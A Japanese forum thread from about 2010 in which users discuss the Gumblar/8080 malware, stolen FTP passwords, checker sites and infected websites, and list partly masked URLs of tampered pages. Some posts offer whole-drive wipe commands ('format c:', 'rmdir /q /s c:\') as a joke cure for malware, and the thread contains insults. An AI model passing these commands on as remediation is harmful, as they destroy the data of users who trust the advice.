レジストリ完全消去ツールも発表とか、対応スゲーなあ
ボランティアなのに、有り難いことだ

まぁまたやられるんだけど
他の使っといたらいいよ。

>385
オープンソースの強みだな
もう乗り換えちゃったけど

>>383
そういうところもあるだろうし
違うところもあるだろう

>>391
強みでもあり、解析されるという弱みでもあり…ホント諸刃の剣だな

例のブログ、お詫び記事がお詫び記事に見えない件

ブログみてきた

Sota　かわいそす

ってか FTPソフト　乗り換えるべきなんでしょうか？

FFFTP使っていてやられちゃうような人は
何使ってもやられるから気にすんな

>>394
乗り換えるべき
>>395
そんなことないね。

感染しなければどうと言う事は無い

不安がって騒ぐ人って、まず感染予防してるのかそっちのほうが心配

>>394
その前にちゃんと対策すれば大丈夫

>>394
心配ならOSをMacかLinuxに変えれ
Windows由来の脆弱性は突かれないから

まぁ騒いだおかげでFFFTP改善されたともとれるし結果オーライでね？

GumblarChecker 2は色々な理由で現在停止されています、そのうち復活するかもしれません
ソースコードは公開してるので気が向いた人はそのまま使うなり改造するなりして使ってください、著作権は放棄しています
ttp://www.dotup.org/uploda/www.dotup.org610235.rar.html

windows9x系はどう対応すればいいの？

>>402
今までありがと。

PCを投げ捨てます

>>402
え？理由はよくわからないけど、感染してたの？
理由教えてほしいな・・・他の人も使ってただろうし・・・

>>403
プラグインでまだサポートのあるのは最新に
その他ははアンインスコ
ルータ噛ます
ブラウザは最新版でいまだに使えるOPERA10.10にする……とかかなぁ
そもそもこのスレで話題の奴は9xで感染拡大するのかわからんけど

ふむふむ。これが噂のPHPというやつか。

さっぱり分からん。

>>407
ありがとう

>>385
http://mag.matrix.jp/mag/queen/log/soft/eid743.html
この仕方がいまいち解らないんだけど
ソースとバイナリってのをFFFTPのフォルダーに入れるの？
誰か説明して下さい
お願いします。
やり方を1から10までお願いします。

> やり方を1から10までお願いします。
甘え過ぎだろｗ

>>410が管理してるサイトにはアクセスしたくないな

>>402
JavaScriptやcookieが不必要で使い勝手が良く、重宝しておりました。
いままで利用させていただき、大変ありがとうございました。

これからはaguse.jp使うしかないか。

>>412
違いますよ　FFFTPを配布してるサイトのリンク先です＞＜

http://www2.biglobe.ne.jp/~sota/
[2010/1/31]
有志の手により、パスワード漏れ対策版のFFFTPが公開されました。
マスターパスワードを使用することにより、FFFTPにパスワードを記憶させた時の安全性が向上しています。
以下のサイトです。改良＆公開ありがとうございます。
にょろぷにらん・FFFTPパスワード漏れ対処版作ってみた
http://mag.matrix.jp/mag/queen/log/soft/eid743.html

えっ

>>414
バーカバーカ

ｗ

>>416
本当に解らないんです＞＜

日本語も読めないのか‥‥‥

1から10まで必要ないだろ
4までで十分

>>419
ソースってのは何処に入れるんですか？＞＜
要らないファイルなんですか？＞＜

>>421
【初心者歓迎】FFFTPについてのスレ2発目
http://pc12.2ch.net/test/read.cgi/software/1218020216/

俺のせいで変なことになっちゃいましたね・・・
すいませんでした

Gumblar(GENO)はFFFTPを狙ったウィルスなのに誘導嫌＞＜

教えて構ってちゃんは完全放置が基本。
みんな誤検出しないように。

ソースは1070行目くらいと書いてあるが

みんな教えてやれよｗ
感染サイト減ったほうがいいだろ

0、念のためバックアップをとる
1、FFFTPを入れ替える
2、ショートカットのプロパティのリンク先のところで
"C:\Program Files\ffftp\FFFTP.exe"
↓
"C:\Program Files\ffftp\FFFTP.exe" -z おまいの好きなパスワード　←これがマスターパスワード
と後ろに付け加える

3、起動すると正しいパスワードを聞いてくるので今まで設定していたパスワードをそのまま入力

そもそもFFFTPを使っていること自体が間違い
メンテナンスされないプログラムなんて危険だらけ

そういや、Office2000ってもう自動更新してくれないんだよな。
GumblarのたぐいがOffice Web コンポーネントの脆弱性も使ってるようだから、
Office2000を使ってる場合は手動で更新する必要がある。

FileZillaも穴だらけだからな
どこにの乗り換えればいいのやら

パスワード保存しなけりゃいいだろｊｋ

>>427
その設定に疑問があるんですが
ショートカット使ってない場合はどうなるんでしょうか？＞＜

本体のプロパティのところで追加

とりあえず>>402で公開されているGumblar Checker 2を無料鯖に置いてみた。
そのうち改造してみよう
http://gumblar.moepla.net/

>>434
また感染広げるんですか＾＾；

>>402
ちゃんと経緯説明して謝罪しろよ
GENO社員かよｗｗｗｗ

>>435
どういうこと？

>>402
放棄しちゃったのか。。。

>>402
何があったのよ？
あなたのおかげで1つのHPが助かったというのに。

>>433
拡張子変更みたいになって良く解りませんでした＞＜

もう解らないのでFTPソフト変えます＞＜

>>434
死ねよカス

金がないから鯖停止されただけなんだが

でたｗｗｗ
金ｗｗｗｗ

変な人が湧いてるけど何なんだ？

>>440
ショートカット作ればいいだろ

いちいいち本体から実行してるのかよｗ

どういうことなの？

とりあえずお前ら首くくれ

>>443
まあなんだ…変にはぐらかすから変な奴に粘着される流れになってる訳で、最初からそう言っときゃ良かったのにね…
>>445
そういや昨日、FFFTP関連とか言って感染ページのURL貼っていった馬鹿もこの時間帯じゃなかったっけ？

>>443
広告付ければ良かったのに。。。
>>434みたいに（笑）

あれはレン鯖の広告じゃねーの？
自動挿入の

>>449
でも、まあ、金払ってなかったからっつーのも恥かしいから言いたくないのもわかる
何から何まで求めすぎのモンスター化しとるぞ

>>446
ショートカットに鍵かけても直接だと起動するって意味があるんですか＞＜
ショートカットに鍵もかからないけど＞＜

http://www.amsf.or.jp/index.html
俺も仮鯖に置いてみた。
アドバイスよろ〜

>>454
絶対に踏むな

>>455
はい＞＜

見ろ！
外野があんまりアフィアフィ嫌儲に走るからこうなるんだ

うぜーよ顔文字
甘やかすから居座る

でも、金かかるのは承知の上でやってたんじゃないのかな
なら最初から金策すればよかったのにね
あとからどうやこうやってのは変な目で見られると思うよ。

ここまで俺一人の自作自演ｗｗｗ

>>454
はいはい感染サイトなんで踏むの厳禁

aguseリニューアルされてカスペの検出可否に関係なくGumblar判定出してくれるようになったのは嬉しいところ
どこまで変化してるスクリプト追えるのかは分からんが

>>459
うるせーな
じゃあお前がやれよ
最後まで責任とれってか
金もださずにごちゃごちゃ師ね

>>454
馬鹿かもう飽きたわ。

>>454
.replace(/\^|@|\!|&|\)|#|\$|\(/ig, '')...がうんたらかんたら

>>462
なら、あなたがやればいいんじゃないでしょうか？（笑）

aguse進化しててわろた

http://gumblar.s1.dynamitelife.net/
広告ありの無料鯖はダメみたいなのでこっちにしました

>>466
俺もそう思ったｗ

>>465
お前なんでこんなとこにいんの？

>>458
この人が犯人です＞＜

>>469
お前もなんでいんの？ｗwwwwwwwwwwwwww
乞食なの？ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>466
進化は良いんだがJavaScriptを完全に有効にしなきゃいけなくなったところは残念。機能的に仕方ないんだろうけど
前のはJS切ってても必要最低限の機能は使えたから

まあGumblarチェッカーの選択肢増えたのは良いことだと思う

>>467
ありがとう

>>453
おまいには無理だ
ビルダーでも使ってアップしなさいｗ

>>454
Good bye 0001
Thank you. Maybe, not be proxy...

>>471
臭いから帰れよ

荒れ過ぎワロタwwww

今日はGumblarそのものよりも
Gumblarをめぐる人々の周辺に動きがあり過ぎて
なかなかカオスな一日でした。

>>474
みんな無理って事じゃないですか＞＜

>>479
いったいどこでつまずいてんだよｗ

>>443
ドンマイ。助かってたよ、今までお疲れさま。
なんなら募金したいくらいだわ。アフィとか自分は気にしないし。

>>478
ネットってホントに怖いところですね…

>>480
相手しちゃだめ

＝＝＝ここからお寿司タイム＝＝＝

　　　　　　,-――――――-.
　　　　　 /　　　　　　　　　　 |
　　　　　/　　　　　　　　　　　|
　　　　 /　 　　　　　　　　　　 |
　　　　l"ジェンキン寿司　　　l
　　 ,､_lー-―――――‐--、/l
　　 i ﾄ､ﾐﾐ　,r‐- ､｀`'ニ=‐、.彡ﾘ.
　　 ヾ,iﾊ゛.´ _,,､_ 　i.;　_,.　｀ 彡'i)
　　　 ｀､j,'　 `ﾟ''´:.ﾉ i::<･ゝ) .ﾊン 　　　　　　へいらっしゃい!!
　　　　　i, 　 ｀ ,､/　i_　｀`　,r'
　　　,r〃 'i　 ,r'ヽ、 _,〉　　/.
　　 /i:ﾄ､;;i, 　ﾐ=_‐_-, 'i　/ヽ__
r-‐'´i::::ﾊ;;ヾ、‐‐-､　 ノ´/i:::'i｀i‐- ､_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i､ 'i::!　i::::i　｀
:i'　i:|　!:::l _,r.､;;;;;,r''´ヽi. ll::i　i::i　l:::'i

>>480
ショートカット押したらユーザーアカウント制御って出て　はい　押したらパス聞かないでFFFTPが開くんです＞＜

>>478
何らや、レスというか、書き込む人間自体が感染しているようで
廃人の並んでいる姿は、とても見応えがありましたね

こういうのを見てウィルス作者は楽しんでるんだろうなー。

8080と呼ばれているウイルスですが、
FFFTP以外にもSmartFTP、FileZilla、WinSCPのアカウント情報を盗みFTPサーバーへアクセスしてきます。

らしいｂｙTwitter

>>483
この人も犯人です＞＜

FTPプロトコルの問題とGumblar、8080ウイルス対策の違いが分かってないのが湧いてるのか？

FTP の危険性に関して超簡単まとめ | WWW WATCH
ttp://hyper-text.org/archives/2010/01/ftp_security.shtml

>>488
日本人じゃないです

>>402>>443
鯖会社に今現在web上で起きている事と、
置いてるツールが何かを説明すれば･･･
鯖をタダで貸してくれるかもしれんよ。


FTPの話に夢中な奴ら＞スレチだから他の板でやってくれ。

>>488
ウイルス作成者と言うよりはネット上でしか威張れない荒らしが一番ほくそ笑んでるんじゃないの
人を混乱させてギスギスしているのを見て楽しむという非常に趣味の悪い人種

？マグロ

>>491
使うなって書いてある＞＜

>>480
ユーザーアカウント制御がでるってことはあれだ
それ古いバージョンだから
今のFFFTPをアンインスコして新しいのをＤＬしてもう一度入れ直してから
対策版に入れ替えてみ

>>493
鯖会社も慈善事業じゃないんだから…
そんなことしたら変に利益化しようとするかもしれんよ。ネットの無料サービスには裏に絶対何かある

>>497
やってみます＞＜

>>491
＞私はセキュリティの専門家ではありませんので
だめじゃんｗ

>>500
あんたはセキュリティベンダーがアナウンスしたことしか信じないし、ベンダーが言ったことは100%信用するって人なのか

まあ欠点を必死で見つけようとする人種だからしょうがない

あそこまで書いておきながら一番最後にセキュリティの専門家でないとか言われたらがっかりするだろ

>>497
同じでした駄目みたいです＞＜
WIN7ではならないのかもしれません＞＜
出来た人は教えて下さい＞＜

ガンブラーはFFFTPを狙ったウィルスです

私はセキュリティの専門家ではありません

>>504
ドンマイ！

これよさげじゃね
http://www.forest.impress.co.jp/article/2009/01/06/alftp.html

>>505
GENOに感染してFFFTPのPASS変えてPCも買い換えて古いPCはGENOに感染したままで放置
がんばります＞＜

お前らどこまでのレベルを求めてるんだｗ
自分の個人ブログの中でまとめて、正直に「私はセキュリティの専門家でない。間違ってたり抜けてたら指摘してくれ」って言っただけでダメなのかよ

言ってる奴は乞食なんだから仕方ない

別のエサがでればすぐ食いつくなｗ
おまえらコイかよｗｗ

マスコミにも報道されたし、ピンからキリまで色んな奴が来るだろｗ

今来た
>>402　どうもありがとうでした

>>443
遅まきながら今まで乙。お世話になりました。

誰も寄付せずｗ
冷たい奴らだぜ

ttp://www.o-kyousei●jp/
aguseで検出できない

>>515
>>467のだと反応するね

ttp://www.briant.co●jp/
aguseこっちは検出するなあ。同タイプのスクリプトなんだけど。
外部スクリプトファイルに反応してんのかな

>>515
めるぽ

>>518
乙です

>>515
凸完了

>>520
乙です

ttp://vidg5z.sa.yona.la/

ttp://vidg5z.sa.yona.la/2759
>情報源が2Chかよ

Adobe系、JRE等各ソフト、WindowsUpdateが最新、アンチウイルスソフトもこまめに定義更新
Adobeリーダー及びIEのJavascriptオフ、サイト・ブログ運営無しならGumblarに対する死角は無い・・・かな？

>>523
WindowsUpdateじゃなくてMicrosoftUpdateにしてね

今のところね。

>>522
引用元の人が怒ってくれてるから煽らんでよろしい
どう見てもそいつ中二病だし

>>517
とりあえずwhoisからめるぽ

puppet乙

JavascriptってYouTube以外で使ってるところあまりない？
スポーツ系サイトとかどうだろう

ありすぎてこまいっちんぐ

使ってないところのが少ないだろ
個人サイトとかはともかく

2階のコンテナの前で「こんにちはー宅配便ですー　あれー？」

おおスレ間違えたｗｗｗ

地図検索とかサジェストとかの便利なサービスは全てJavaScriptで動いていると思っていい。
だから、>>522のリンク先みたいな極論を語る奴は気違い扱いされる。

ttp://tfusvsun●tfu●ac●jp/~arakiweb/j04/tatsuya/index●html
ttp://t-tennis-web●hp●infoseek●co●jp/index●html
ttp://www●eonet●ne●jp/~kirameki-siga/index●htm
ttp://suemari●com/a/rakuten/index●js (駆除作業中？)
とりあえずURLだけですんません

>>527
乙です

>>522
なんか誤字だらけの文章なんだが、こいつは自分の書いたものを読み返す習慣がないのか？

>>402 は何で止めたの？

>>532
なんということでしょうｗ

>>346
あまりにも執拗に正論を言うとき、人は裏側に嫉妬とコンプレックスが潜んでいます。
ttp://tamesue.cocolog-nifty.com/samurai/2010/01/post-6f11.html

やっぱりスポーツ選手って日本語もろくに書けないんだな

これって telnet とかで html ソース取得して、
テキストエディタで眺める分には安全ですよね？

>>522
このサイト開くと、まず1行目にジャバスクONしてくれって出てくるんだが

ONにしないとコメントもできないとか

>>542
telnetって平文だよね
安全とはいえないんじゃないかな

>>515
janeの登録するためのリンク先教えてください

telnetなんて絶滅してるだろ

windows 7でもtelnetコマンドあるじゃん、デフォルト無効だけど

aguseにいけない
エラーになる
皆使いすぎじゃね

wget か cURL でも使ったら？

>>544
Js否定論者なのにONにしないと書き込めないとかどんだけ矛盾してるんだよって話しだよな

>>549
行けるには行けるが、
「検出されたマルウェア」の項目が、
情報取得中のまま更新されねー。

ざまあ

>>402,443
ありがとう、お疲れ様でした。
転送量オーバーで追加料金発生的な話？

ざまあ

>>523
ゼロデイで攻撃されればなすすべがない。今回の教訓は正にこのことです。

なすすべはいくらでもある

>>557
ひとつだけある。インターネットに繋がないこと。

確実にウイルスを駆除する方法
format c:

>>556-557
LANケブールをハサミで切れば良いw

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　 　 　 　 　 　 　 |　　　　　　　 >>560
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |　.＿＿　 　　いらないＰＣを
　　　　　|　 　 　 　 | 　 　 　 　|　　 |　|＼＿＼　　窓から投げ捨てろ
　　　　　|　 　 　 　 | ∧＿∧　|　　 |　|　 |.◎.｜　
　　　　　|　 　 　 　 |（　´∀｀）つ ミ |　|　 |.：　｜
　　　　　|　 　 　 　 |/ ⊃　 ﾉ　|　　 |　.＼|.≡.｜
　 　 　 　￣￣￣￣'￣￣￣￣　 　 |　　　￣￣

>>535
めるぽ
めるぽ
whoisからめるぽ
whoisからめるぽ

>>562
ansitu.xrea.jp
DNS設定が見つかりません! / DNS ERROR!
考えられる原因
# ドメイン設定が行われていない、または、反映されていない
# ドメイン、サーバーの契約期限が切れている、または、解約になっている

(´･ω･`)

で、お前ら今日は何をしたの？

>>560
LANケーブルがないんだが．．．

>>559
MBRはどうすんの？

>>559
「ボリュームが別のプロセスによって使用されているため、Formatを実行できません。」

>>560
はさみを持ってないんだが．．．

www●horimasa●co●jp/
interiorshop●jp/

avattop●ru

またスクリプト変わってきた？

MBRはペンを使って手書きしなさい

>>564(45)
この荒れっぷりorz
飽きて消えるまで待ちましょう･･･

スクリプトばら撒いてる人か組織か知らんけどコロコロ変えて本当に勤勉だなぁ
どっかアングラな世界で金生み出してるのか

>>564って誰？

>>568
感染しているサイトのテキストの最後に
<!--fb57962912cbfdc1b81d9fedd546ce6d-->
<!--5f3821d54cb878a64651648758477fc0-->
のようなコードがあるのだがこれはウイルスが難読化
コードと共に追加したものですよね?

マガジンXという自動車雑誌のホームページ。
JS/Agent.33127を検出。
通報してません。誰か頼む。
リンク元　　ttp://www●mag-x●com/blog/2010/01/
リンク先　　ttp://www●mag-x●com/gallery/cover/　　←ココが改竄されてる

>>573
うん。そのMD5みたいなのは前からあったよ。何だかは知らないけど。
jsには追記されない。

暇なので通報のお手伝い致します
3時頃まで起きてます

>>568
めるぽ
めるぽ

>>574 /*Exception*/
前々々スレ/*LGPL*/、前スレ/*Exception*/から計3回、内返事は前々々スレの/*LGPL*/対応の１通のみ。
改ざんページは減ってはいるので公開サーバーを止めずに掃除中かも。。。

参考に
サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2138

MBRって0フィルすれば消せるんじゃね？

510バイト目の55 AAを消せばいい

MBRのブートシグネチャっていうのか、勉強になった

今日は寝ます
お疲れ様でした。おやすみなさい。

ttp://venus.bbspink.com/test/read.cgi/ascii/1256115560/665

↑このレスのリンク先やられてる？
オンラインチェッカーでノートンsafe、カスペ不明なんだが・・・

確実にマルウェアも削除できる方法
rmdir /q /s c:\

本当に危険なので、自己責任で実行してください。

そのコマンド見たの久しぶりだなｗ
ディレクトリ全削除だっけ？

>>583
'rmdir' が見つかりません。名前を正しく入力したかどうかを確認してから、やり直してください。

というエラーが出ます。XPには対応してないのでしょうか？

ググって事故解決しました。コマンドプロンプトでの実行だったんですね。
でもコマンドプロンプトでやっても、アクセスが拒否されましたとか、プロセスはファイルにアクセスできませんというエラーが山ほど出て、うまくいきません。
相当手強いマルウェアみたいです。これはもうフォーマットするしかないでしょうか？

>>586
何がしたいのか解らんが好きに汁ｗ

サイトに連絡したら返信くる?

管理放棄されてたり存在を忘れられたりしてなければくるんじゃね？

悪質なアフィリエイト・商材販売サイトは放置の方針で

放置って…誰の為の通報か勘違いしてんじゃね？

どんな悪質でも感染したサイトより
うっかりサイトを見ちゃった人が被害が大きいのは問題じゃね？

面倒なので、サイト名は省略

きっと最新型
tp://www●tedukuri-happy●com/
※ /uchiwa に名無し旧型あり

GNU GPL
http://www●work-cospre●com/rss/index●php


だらだら調査中･･･

アスクル代理店　株式会社丸吉

告知無し　再開ｗ

MBRは回復コンソールからFIXMBRじゃ駄目なの？

LGPL
tp://www●chantaltrim●com/shop/index●php

>>132
まだ放置されているな。

>>595
ダメな場合が多いのです。

>>597
Last-Modified: Mon, 01 Feb 2010 04:37:58 GMT

>>599
それ、最終改ざん日時じゃね？

>>598
そうなのか……

これVMware上のゲストOSに感染する？
いくら試しても感染してくれん・・・途中でリブートされるけど
うまくいってリブートてより、ハングってリブートって感じ

環境はこんな感じ
Windows XP SP2
Internet Explorer 6.0
Adobe Reader 7.0
Flash Player Flash 7.0.70.0
JRE 6 Update 10

PDFやJavaは動作すると思うよ。
そこから先のバイナリはコロコロ変わるからアレだけど、2日前に拾ったのでは
レジストリからハードウェア情報( HKLM\Hardware\Description\System )を
読み込んでるからそこらの著名なVMそのままだと回避されちゃうかもね。

tp://kenary●jp

ユーザのアクセスログ調べてたら見つけた。

>>603
ありがとうございます！もう少しいろいろ試してみます。
とりあえずVMware上の>>602の環境では
>>593>>575>>568は感染しませんでした。
現在実機で環境構築中です。

チェッカー作った　かなり手抜きｽﾏｿ
http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/

>>467があるからいらないです

>>606
あしはつかっちゃる

>>606
Gumblar/8080 Not Found.
ならクリーンってことでおｋ？

>>609

おk

何その垢ハックみたいなアドレス

>>491
亀レスだが
ソフトのパスワードが盗まれるのは初期の頃から分かってた
なぜか急に騒ぎ出したようだが

FFFTPの問題で一気に広まったんじゃね

スレ1の時から常識だったのにな

みんなが知らないと意味ないから
それはそれで良いけどFFFTPばかりが注目されすぎだな
俺なんかFileZillaからパスワードのコードだけ変えたFFFTPに乗り換えた

>>610
�d
js無使用3939使ってみます

(1) 保存されたパスワードが抜かれる
(2) webページ更新時の通信でパスワードが抜かれる
8080系は(2)もやってんの？

>>612-615
ヒント：同人板で大騒ぎ

>>617
やってると思う。 >>603 のexe、WinSock2フックしとる。

>>618
やられてる人は多いだろうね。普通の人はそれほど縁がないJavaも
お絵描き掲示板では必要だし。んで古いJavaそのままみたいな。

>>619
そうか、ありがとん

>>618
あそこの連中は8080が一般ニュースになって
世間が騒いでる真っ最中でさえ

「以前感染警告や感染告知出したら質問メールが数通来た
だから今回告知出すのﾏﾝﾄﾞｸｾ」

とか言い出してたからなｗ
それが自分の身にダイレクトに降りかかるとわかった途端
一転してパニックモードですよ。

GENOの時も思ったが、あそこは本当にクズの集まり。

あとSSL非対応だから問題があるような書き込みも多いけど違うだろ
保存してあるパスワードが盗まれることが問題なんだから
もちろん安全性は高まるけど

>>593
めるぽ
whoisからめるぽ

借りてる鯖がそもそもFTP以外使えない

>>596
whoisからめるぽ
海外鯖っぽいので無視される鴨。。。

規制

最新の奴はどのアンチウィルスソフトでも引っかからないよな。って当り前だけど。
頻繁に更新するもんだから全然役に立たねぇー。
ウィルスソフトさえ更新しとけば大丈夫とか思ってる奴は確実にやられるな。

引っかからないのはスクリプトだろ？
そのほかの段階で防御可能なら感染の問題はない

各アプリ(Java、PDF、etc.)を常に最新にしておくことが最も重要。
Adobeがゼロデイをしばらく放置したおかげでひどいことになったけど、
現時点では防げるからね。
アンチウイルスだのFTPクライアントは何がいいだのは二の次だよ。

その通りだよ。
感染前の対策が出来ていれば感染後のことなんて騒ぐ事じゃない。
新たな脆弱性なんて持ち出したらキリがないしな。

そんなことは知ってるだろ
アンチウイルスさえ更新しとけば大丈夫とか思ってる人の話だろ
でも常に最新に出来ないような場合もあるんだよね

>>629
最後ウィルス落としてくるじゃん。
あれもアンチウィルスソフトだと引っかからないな。
引っかかるようになると引っかからないもんに変身する。

>>633
当たり前だがソフトによるよ
脆弱性を攻撃する際に検知するやつもあるし

>>604
めるぽ

>>630
> 各アプリ(Java、PDF、etc.)を常に最新にしておくことが最も重要。
> Adobeがゼロデイをしばらく放置したおかげでひどいことになったけど、

当時最新を心がけている人で、readerのJavascriptを切ってないような人は
少なかったんじゃないかなぁ
感染してる人はadobeゼロデイ以前の問題のような気がする

ブラックリストフレームワーク（）とかいう誰も使わないステキ機能もあったしな＞Adobe

tp://www●deviantart●com/
やばい？？

>>638
GumblarChecker 2だと検出されなかったけど

deviantartが感染してたら大惨事だ

tp://www●.horimasa.co●.jp/?mono/dvd/-/detail/=/cid=iptd545/
上記のサイトをaguseで調べたら可能性ありと出たんだが、どうかな？

>>639-640
だよな、めんご

>>641
チェック対象から3件検出されました

>>643
ありがとうございます。

>>641
>>568の一番上と同じじゃね？

horimasa本家もやられてるなあ

これ変更のスピードを圧倒的に早くすると確実に対応出来ないよな。
感染しちゃってるけど検知されないまま残る奴も居る訳だ。
っていうか多分現時点でそういう奴も居るんだろうな。

ゼロデイで仕掛けられると脅威だな。

Adobeがパッチ出すのを渋ったせいでこのありさまだよｗ

>605
IP変えて踏んでる？

同じIPだと2回目以降はダウンロードされないとかってあったはず

FFFTPの件はライフハッカー(笑)にも載ったのか
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
そのへんも拡大要因かな
しかし迷惑な話だ

avastが最新型(ru:x/eval)に対応
JS:Illredir-F [Trj]
やっと来た…

gnomeさんのとこで反応が出てうざい（苦笑＠avast

>>652
しょうがないから除外設定したよｗ

>>647
コードの進化(毎日絶賛進化中)が止まってるみたいだから
新しい脆弱性攻撃の仕込みをやってるのかもしれん。

ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2122
コレとか

それはpatch出てるから今更感がある

どちらにしろMSIE,Adobe製品の脆弱性を使うだろうね
穴多い上に対応が遅いし

MSは速いだろ

更新しない人が多いってだけだよな

【Dr.Web anti-virus link checker】
ttps://addons.mozilla.jp/firefox/details/938
陥落サイトを全部検知しやがる･･･

>>659
どこがじゃｗホリマサだめだったぞ

>>659
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

Firefox以外のブラウザでも第三者スクリプトのみを簡単にブロックする方法はないかな？

>>660
ttp://lovestube.com/up/src/up3447.jpg

IEならインターネットゾーンのレベルを高にして必要な物だけ信頼済みサイトにドメインを追加するとか

koko.konotan●com/bustup/
www.to-an●jp/content/
kinyu64.choicash●com/
www.health-insurance-101●com/

新しい改ざんはどれもコードの埋め込みに失敗してない？
この状態でスクリプトは動くのかなぁ。

>>663
６４１は、自分のだと検出されないんだが・・・

>>647
ヒューリスティックであやしい挙動のスクリプト全部とめるってのも手だな
まあ誤検知もあるだろうけど

>>656
MSはその中じゃ一番早いだろ

ゼロデイに使われる危険度が緊急のアップデートはかなり早い
firefoxとかlinux系より早いよ

＞firefoxとかlinux系より早いよ
いや、それはないｗ
散々放置の前科持ちだから

前科はともかく、いまはMSが一番早いだろ
firefoxやlinuxは、開発社サイトやメーリングリストにソースコードレベルのパッチが投稿されるのは早いが、
正式にアップデートが提供されるのはそこそこ時間がかかる

自分でソースコードにパッチ当ててコンパイルする人じゃなければ時間かかるな

何を必死になってるの？

>>670
いや遅いよ
先月の緊急パッチだって事前に検証が進んでいたからあのタイミングで出せただけで
ゼロデイだったなら緊急配布は不可能だし2月どころか3月のパッチにも間に合うか微妙な感じ

>>665
陶芸教室のは失敗してないんじゃね。
他のは変なところでタグが切れてるけど、ページは表示されるし
scriptタグもちゃんと書かれてるから、実行されそうだが…

トレンドがGumblar対策で売ってるけど本当に止められるのか？

日本に出回っているソフトで対策ができるかなと思うのはカスペ以外思い浮かばないのですが？

カスペ？
なんで？
ノートンなら最初から防御できたよ

いつものようにvirustotalでスクリプトだけスキャンして判定してるんだろ

ttp://www.odnir.com/cgi/src/nup44340.jpg
ttp://www.odnir.com/cgi/src/nup44341.jpg

www●eco-rt●jp

殆どのファイルにコード書かれてた…

ttp://www.oshiete-kun.net/archives/2010/02/ffftp.html

あーあ。。。

>>674
一応2010なら変なアドレスとの通信は止まるみたいだけど、
8080本体を完全スルーした前科ありなので危険。
♪サクサク感染〜　になりかねない

新しい Avira エンジンの更新が実行されました。
新しいエンジンのバージョン番号 :
AV7 7.9.1.156 / AV8/9 8.2.1.156
変更内容 :
- 修正 : 誤検出
HTML/Spoofing.Gen
HTML/Silly.Gen
HTML/Malicious.PDF.Gen
HTML/ADODB.Exploit.Gen
HTML/Crypted.Gen
HTML/Infected.WebPage.Gen
HEUR/HTML.Malware

来たかな

>>679
ひどいな

>>665,>>678
めるぽしたり、whoisからめるぽしたり。

>>682
ネトランだからな…

>>683
いつもありがとうございます。

どこがひどいの

www●eco-rt●jp
↑
こいつの先のスクリプトも失敗してないか？
俺はjavaに詳しくないからよくわからんが
文字コードを区切ってるsplitってちゃんとした区切り文字入ってないことないか？ずっとそうだけど。
それと文字コードを文字に変換してる所も以前は+4じゃ上手く変換されんな。

スマソ。
×→それと文字コードを文字に変換してる所も以前は+4じゃ上手く変換されんな。
○→それと文字コードを文字に変換してる所は+4じゃ上手く変換されんな。

>>678
コード消えてね？見当たらんのだが

16:33 の魚拓
http://megalodon●jp/2010-0202-1633-50/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Eeco%2Drt%2Ejp%2Findex%2Ehtml
ぐぐったら出てきた。眠いから後は誰か宜しく。

>>690をaguseで開いたら俺のavastたんが火を吹いたんだが

ソース見る限りエンコードしてるっぽいから誤検出だと思う

>>692
やっぱ誤検出ですよね。よかた
ありがとうございます
魚拓をaguseで踏むようなチキンにあの警報音はきつい

>>132
お昼に電凸
現状無害
一応完了

にしても何でスクリプト失敗してるんだろうな。
たまたま失敗してるのか
意図的に失敗させてるのか
誰かに書き換えられたのか
どれだろうな。

結構いい所で失敗してるぞ。
誰か書き換えてたりしてな。

もし任天堂やソニーのHPがGumblar感染発覚したら大騒動になりそう・・・

色々な感染告知を見て思うんだが、こういうのってわざと

(1)index.htmlな告知ページ
(2)JavaScript無効だと見れない告知
(3)PDFの告知
(4)告知のリンクがFlashの中

index.htmlな告知ページが改ざんされてたのは、さすがにキレたけど
おまいらはどの辺まで許容範囲？

今の状況じゃ告知されてりゃマシなほうじゃね

こんなウイルスを作るやつが生まれてきたのが許せない

すいません

>>699
そうだよな
ウイルス作ったやつは公開処刑されるべき
国を揺るがしかねないからテロリストと同類だしな

一回、馬鹿でかい損害賠償とかあればね・・・

>>702
損害賠償請求されるといろいろ面倒だから今回は破壊工作してこないんじゃないかな

告知ないほうが困る
だから、告知してるだけマシだ〜

Apple関係のプログラム(updateとか)をアンインスコしたが、Quicktimeは除去し忘れてた。
この状態で踏んだら「このコンピュータにはQuicktimeが見つけられませんでした」
のようなメッセージが無限に出てきたんだけども、大丈夫かな。

　　www●geocities●jp/honeybee_site/index●htm

ここは質問スレじゃねーぞ

ざっと見た感じ何も無いと思うが

>>705
埋め込みMIDIを鳴らそうとしているだけだ。馬鹿たれ。
何でもかんでもウイルスだと疑う前にページのソースぐらい確認しろ。

>>701
実際今回のウィルスは超国家的インターネット絶滅作戦の一環だと思う

妄想厨は死んだほうが良いと思う

宿泊所紹介サイトが改ざん、閲覧でウイルス感染のおそれ - 公立学校共済組合
http://www.security-next.com/011944.html

保険代理店のサイトが改ざん - 閲覧者にウイルス感染のおそれ
http://www.security-next.com/011945.html

名古屋のリフォーム事業者のサイトが改ざん - 閲覧で「Gumblar」亜種感染のおそれ
http://www.security-next.com/011955.html

美容ポータル「スタービューティー」が「Gumblar亜種」による改ざん
http://www.security-next.com/011959.html

奈良女子大運営の情報サイトが「Gumblar」亜種で改ざん - キャッシュから問題が判明
http://www.security-next.com/011959.html

亜種改竄か。

新参ですまん。
マルウェアを感染させて挙動を調べたいとき用にAPIフックするツールを書いてるんだけどめんどくさい。
おまいら解析するとき、何かフリーのツールつかってんの？

p://ding●.hichigosan●com/excessive-perspiration-japan/
p://dooon●konrei●org/foreign-exchange-japan/

まだー？

JPCERT/CC では、以下の FTP クライアントにてマル
ウエアによるアカウント窃取、および外部サーバへのアカウント情報の送信を
確認しました。

- ALFTP 5.2 beta1
- BulletPloof FTP Client 2009.72.0.64
- EmFTP 2.02.2
- FFFTP 1.96d
- FileZilla 3.3.1
- FlashFXP 3.6
